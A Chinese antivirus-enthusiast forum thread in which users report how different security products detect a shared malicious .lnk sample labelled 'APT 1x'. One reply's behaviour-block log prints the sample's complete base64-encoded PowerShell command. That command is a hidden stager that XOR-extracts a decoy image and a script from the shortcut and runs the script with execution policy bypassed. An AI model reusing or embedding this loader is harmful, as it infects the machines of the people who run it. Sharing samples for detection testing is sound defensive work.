收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 APT 1x
返回列表 发新帖
查看: 998|回复: 9
收起左侧

[病毒样本] APT 1x

[复制链接]
吃瓜群众第123位
发表于 6 天前 | 显示全部楼层
Bitdefender Free Scan kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Loyisa
发表于 6 天前 | 显示全部楼层
Elastic

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

浦北光
发表于 6 天前 | 显示全部楼层
卡巴解压杀

事件: 检测到恶意对象
用户: WIN-KKPHI5K2UNM\pubeilight
用户类型: 发起者
应用程序名称: explorer.exe
应用程序路径: C:\Windows
组件: 文件反病毒
结果描述: 检测到
类型: 木马
名称: HEUR:Trojan.Multi.Powecod.n
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402.lnk
对象路径: C:\Users\pubeilight\AppData\Local\Temp\Rar$DRb23424.36078.rartemp
对象的 MD5: E57A461DEAA974EA13628BD4885165B4
原因: 专家分析
数据库发布日期: 今天,2026/4/7 20:45:00

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

white_paper
发表于 6 天前 | 显示全部楼层
安天智甲扫描miss 双击后拦截

威胁等级:威胁
检测引擎:威胁行为检测规则
操作类型:启动进程
行为描述:发现恶意shell命令规则命中事件
规则ID:wop0060008
---------------------------------------------
进程ID:8028
进程路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
文件MD5:6726185B70B5ADF05E8A1A1DF82EBF30
运行参数:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABGAGkAZQAgAD0AIABpAGYAIAAoACQAZQBuAHYAOgBMAE4ASwBfAEYATwBMAEQARQBSACkAIAB7ACAAJABlAG4AdgA6AEwATgBLAF8ARgBPAEwARABFAFIAIAB9ACAAZQBsAHMAZQAgAHsAIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACAAfQA7AA0ACgAkAGUAWQBXACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABGAGkAZQAgACgAJwAxADYAMwAzADEAMAAyADIAMAA5ADUANwA1AC4AagBwAGcALgBsAG4AawAnACkAOwANAAoAJABCAEkARQAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAA7AA0ACgBpAGYAIAAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAJABlAFkAVwApACkAIAB7AA0ACgAgACAAIAAgACQASgAxAEcAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAQgBJAEUAIAAtAHIARQBDAFUAUgBTAEUAIAAtAEUAUgByAE8AcgBhAEMAVABJAG8ATgAgAFMASQBMAGUATgB0AEwAeQBDAG8AbgBUAGkAbgB1AEUAIAB8ACAAdwBoAGUAcgBlAC0ATwBiAEoARQBjAHQAIAB7ACAAJABfAC4AbgBBAG0ARQAgAC0AZQBRACAAJwAxADYAMwAzADEAMAAyADIAMAA5ADUANwA1AC4AagBwAGcALgBsAG4AawAnACAAfQAgAHwAIABzAG8AUgB0AC0AbwBiAEoARQBDAHQAIABsAEEAUwBUAFcAUgBpAFQARQB0AEkATQBFACAALQBEAEUAcwBDAGUAbgBkAEkAbgBHACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYASQByAHMAVAAgADEAOwANAAoAIAAgACAAIABJAGYAIAAoACQASgAxAEcAKQAgAHsAIAAkAGUAWQBXACAAPQAgACQASgAxAEcALgBmAHUATABMAE4AYQBtAEUAOwAgAH0AIABlAGwAcwBlACAAewAgAGUAeABpAHQAOwAgAH0ADQAKAH0AOwANAAoAZgB1AG4AYwB0AGkAbwBuACAAcABsACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAkAEQARgAsACAAJABDAG0ALAAgACQAbQBpAHgALAAgACQAWQBpAG0AKQAgACAAIAAgAA0ACgAgACAAIAAgACQAYQBkAHoAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAJABDAG0AOwAgAA0ACgAgACAAIAAgACQAbgBxAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJABlAFkAVwApADsADQAKACAAIAAgACAAJABuAHEAcwAuAFMAZQBlAGsAKAAkAEQARgAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBFAEcASQBOACkAOwANAAoAIAAgACAAIAAkAG4AcQBzAC4AUgBlAGEAZAAoACQAYQBkAHoALAAgADAALAAgACQAQwBtACkAOwANAAoAIAAgACAAIAAkAG4AcQBzAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAgACAAIAAgAGYATwBSACAAKAAkAEMAaQAzACAAPQAgADAAOwAgACQAQwBpADMAIAAtAEwAVAAgACQAQwBtADsAIAAkAEMAaQAzACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAYQBkAHoAWwAkAEMAaQAzAF0AIAA9ACAAJABhAGQAegBbACQAQwBpADMAXQAgAC0AYgB4AG8AcgAgACQAbQBpAHgAOwANAAoAIAAgACAAIAB9ADsADQAKACAAIAAgACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABZAGkAbQAgACQAYQBkAHoAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUAOwANAAoAfQA7AA0ACgAkAHAASwAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAQgBJAEUAIAAoACcAMQA2ADMAMwAxADAAMgAyADAAOQA1ADcANQAuAGoAcABnACcAKQA7AA0ACgBwAGwAIAA4ADEAOQAyACAAMgAzADEAOQA4ACAAMgA1ADAAIAAkAHAASwA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAASwA7AA0ACgAkAFoASQAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAQgBJAEUAIAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAIAArACAAJwAuAHAAcwAxACcAKQA7AA0ACgBwAGwAIAAzADEAMwA5ADAAIAAxADIAMwA5ADQAIAAxADMAOAAgACQAWgBJADsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwAHIAbwBmAGkAbABlACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AZgBpAGwAZQAgACQAWgBJADsADQAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAWgBJACAALQBGAG8AcgBjAGUAOwA=
处置方式:阻止启动

父进程信息:
进程ID:5344
操作进程:C:\Windows\explorer.exe
文件MD5:02280F4613E3D8EB6579D79AB7A182CA
运行参数:C:\Windows\Explorer.EXE
处置方式:未处置

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

white_paper
发表于 6 天前 | 显示全部楼层
江民赤豹解压杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

心醉咖啡
发表于 6 天前 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

white_paper
发表于 6 天前 | 显示全部楼层
360杀毒扫描miss 360安全卫士报毒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

fast777
发表于 5 天前 | 显示全部楼层
下载完,McAfee就杀了
回复

举报

c199529
发表于 5 天前 | 显示全部楼层
腾讯电脑管家18

---------------------
2026-4-8 23:24:17 MD5:e57a461deaa974ea13628bd4885165b4
20260407APT1x\aaa9797d4c3a758f53b26c5fde22b278fcd0f9efde7b91fc0071e44c0c701402.lnk [Win32.Trojan.Powecod.Rimw]
---------------------

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-13 04:48 , Processed in 0.109772 second(s), 6 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表